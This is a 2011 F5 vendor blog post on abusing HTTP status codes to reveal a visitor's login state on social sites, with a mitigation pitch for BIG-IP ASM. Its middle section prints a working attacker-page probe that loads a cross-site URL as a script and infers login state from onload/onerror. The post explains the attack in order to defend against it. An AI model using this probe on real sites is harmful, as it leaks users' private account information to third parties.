F5 Friday: Expected Behavior is not Necessarily Acceptable Behavior

Sometimes a vulnerability is simply the result of a protocol design decision, but that doesn’t make it any less a vulnerability

An article was passed around the Internets recently describing a new attack on social networking applications, one that effectively provides an opening through which personal data can be leaked.

If you haven’t read “Abusing HTTP Status Codes to Expose Private Information” yet, please do; it’s a good read and exposes, if you’ll pardon the pun, yet another “vulnerability by design” flaw that exists in many of the protocols that make the web go today.

We, as an industry, spend a lot of time picking on developers for not writing secure code, for introducing vulnerabilities and subsequently ignoring them, and for basically making the web a very scary place. We rarely, however, talk about the insecurities and flaws inherent in core protocols that contribute to the overall scariness of the Internets. Consider, for example, the misuse and abuse of HTTP as a means to carry out a DDoS attack. Such attacks aren’t made possible by some developer with a lax attitude toward security; they’re simply the result of the way in which the protocol works. Someone discovered a way to put it to work to carry out their evil plans.

The same can be said of the aforementioned “vulnerability.” This isn’t the result of developers not caring about security, it’s merely a side-effect of the way in which HTTP is supposed to work. Site and application developers use HTTP status codes and the like to respond to requests in addition to the content returned. Some of those HTTP status codes aren’t even under the control of the site or application developer – 5xx errors are returned by the web or application server software automatically based on internal conditions.
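To make that concrete, here’s a minimal sketch – not any particular site’s code – of the kind of endpoint that behaves this way. The path, cookie name, and port are hypothetical; the point is only that the status code itself reveals whether the requester is logged in.

```typescript
import http from "http";

// Hypothetical endpoint: the response status depends on whether the
// request carries a session cookie.
http
  .createServer((req, res) => {
    if (req.url === "/inbox/unread-count") {
      const cookies = req.headers["cookie"] ?? "";
      if (cookies.includes("session=")) {
        // Logged-in visitors get a successful response with their data...
        res.writeHead(200, { "Content-Type": "text/plain" });
        res.end("3");
      } else {
        // ...anonymous visitors get an error status.
        res.writeHead(403, { "Content-Type": "text/plain" });
        res.end("Forbidden");
      }
      return;
    }
    res.writeHead(404);
    res.end();
  })
  .listen(8080);
```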

That someone has found a way to leverage these basic behaviors in a way that might allow personal information to be exposed should be no surprise. The more complex web applications – and the interactions that make the “web” an actual “web” of interconnected sites and data stores – become, the more innovatively these admittedly very basic application protocols must be used. That innovation can almost always be turned around and used for more malevolent purposes.
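The article’s technique boils down to observing those status codes from another origin. Here is a rough sketch of such a probe, pointed at the hypothetical endpoint above; it assumes the browser sends the victim’s cookies along with the cross-site request, as browsers generally did by default. The attacker’s page never reads the response body cross-origin – it only learns whether the load succeeded or failed.

```typescript
// Runs on the attacker's page, in the visitor's browser.
function probeLoginState(resourceUrl: string): Promise<boolean> {
  return new Promise((resolve) => {
    const probe = document.createElement("script");
    probe.onload = () => resolve(true);   // 2xx status: visitor is likely logged in
    probe.onerror = () => resolve(false); // error status: visitor is likely anonymous
    probe.src = resourceUrl;
    document.head.appendChild(probe);
  });
}

// The URL is made up for illustration and maps to the endpoint sketched above.
probeLoginState("https://social.example/inbox/unread-count").then((loggedIn) => {
  console.log(loggedIn ? "visitor appears logged in" : "visitor appears logged out");
});
```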

What was troubling, however, was Google’s response to this “vulnerability” in Gmail as described by the author. The author states he “reported it to Google and they described it as ‘expected behaviour’ and ignored it.” Now Google is right – it is expected behavior, but that doesn’t necessarily mean it’s acceptable behavior.

PROTECTING YOURSELF FROM BAD EXPECTED BEHAVIOR

Enabling protection against this potential exposure of personal information depends on whether you are a user or someone charged with protecting users’ information.

If you didn’t read through all the comments on the article, then you missed a great suggestion for users interested in protecting themselves against what is, in effect, similar to a cross-site request forgery (XSRF) attack. I’ll reproduce it here, in its entirety, to make sure nothing is lost:

Justin Samuel

I'm the RequestPolicy developer. Thanks for the mention. I should point out that if you're using NoScript then you're already safe as long as you haven't allowed JavaScript on this or the other sites. Of course, people do allow JavaScript in some cases but still want control over cross-site requests. In those cases, NoScript + RequestPolicy is a great combo (it's what I use) if the usability impact of having two website-breaking, whitelist-based extensions installed is worth the security and privacy gains. RequestPolicy does have some good usability improvements planned, but if you can only stand to have one of these extensions installed, then I recommend NoScript over RequestPolicy in most situations.

Written Tuesday, January 25th, 2011

So as a user, NoScript – or NoScript plus RequestPolicy – will help keep you safe from the potential misuse of this “expected behavior” by giving you the means to control cross-site requests.

As someone responsible for protecting your user/customer/partner/employee information, however, you can’t necessarily force the use of NoScript or RequestPolicy or any other client-side solution. First, a client-side solution doesn’t stop the data from leaving the building in the first place, and second, even if it did and you could force the installation of such solutions, you can’t necessarily control user behavior that may lead to turning them off or otherwise manipulating the environment. The reality is that organizations trying to protect both themselves and their customers have only one thing they can control – their own environment.

That means the data center.

PROTECTING YOUR CLIENTS FROM BAD EXPECTED BEHAVIOR

To prevent data leakage of any kind – whether through behavioral or vulnerability exploitation – you need a holistic security strategy in place. The funny thing about protocol behavior exploitation, however, is that application protocol behavior is governed by the stack and the platform, not necessarily the application itself.

Now, in this case it’s true that the behavior is eerily similar to a cross-site request forgery (XSRF) attack, which means developers could – and probably should – address it by enforcing policies that restrict access to specific requests based on referrer or other identifying, contextual information.
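As a rough illustration only – using the same hypothetical endpoint and an assumed trusted origin – a referrer/origin check like the one below returns the same status for every cross-site request, so a probe learns nothing from it. A real application would pair this with CSRF tokens and whatever protections its framework provides.

```typescript
import http from "http";

// Assumed origin, for illustration only.
const TRUSTED_ORIGIN = "https://social.example";

function requestIsSameSite(req: http.IncomingMessage): boolean {
  const context = req.headers["origin"] ?? req.headers["referer"];
  // Missing Origin/Referer, or one pointing at another site: treat as cross-site.
  return typeof context === "string" && context.startsWith(TRUSTED_ORIGIN);
}

http
  .createServer((req, res) => {
    if (req.url === "/inbox/unread-count" && !requestIsSameSite(req)) {
      // Answer all cross-site requests with the same status regardless of
      // login state, so an onload/onerror probe reveals nothing.
      res.writeHead(403, { "Content-Type": "text/plain" });
      res.end("Forbidden");
      return;
    }
    // ...normal same-site handling would continue here...
    res.writeHead(200, { "Content-Type": "text/plain" });
    res.end("3");
  })
  .listen(8081);
```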

The problem is that this means modifying applications for a potential vulnerability that may or may not be exploited. It’s unlikely to have the priority necessary to garner time and effort on the application development team’s already lengthy to-do list. Which is where a web application firewall (WAF) like BIG-IP ASM (Application Security Manager) comes into play. BIG-IP ASM can protect applications and sensitive data from attacks like XSRF right now. It doesn’t take nearly as many cycles to implement an XSRF policy (or any other web application layer security policy) using ASM as it would to address the issue in the application itself (if that’s even possible – sometimes it’s not). Whether ASM or any WAF ends up permanently protecting data against exploitation is entirely up to the organization. In some cases it may be the most financially and architecturally efficient solution. In other cases it may not. In the former, hey great. In the latter, hey great – you’ve got a stopgap measure to protect data, customers, and the organization until such time as a solution can be implemented, tested, and ultimately deployed.

Either way, BIG-IP ASM enables organizations to quickly address expected (but still unacceptable) behavior. That means risk is almost immediately mitigated, whether the long-term solution remains the WAF or falls to developers. Customers don’t care about the political battles or religious wars over the role of web application firewalls in the larger data center security strategy, and they really don’t want to hear about “expected behavior” as the cause of a data leak.

They care that, when they use applications, they are protected against the inadvertent theft of their private, personal data. It’s the job of IT to do just that, one way or another.



Published Mar 11, 2011
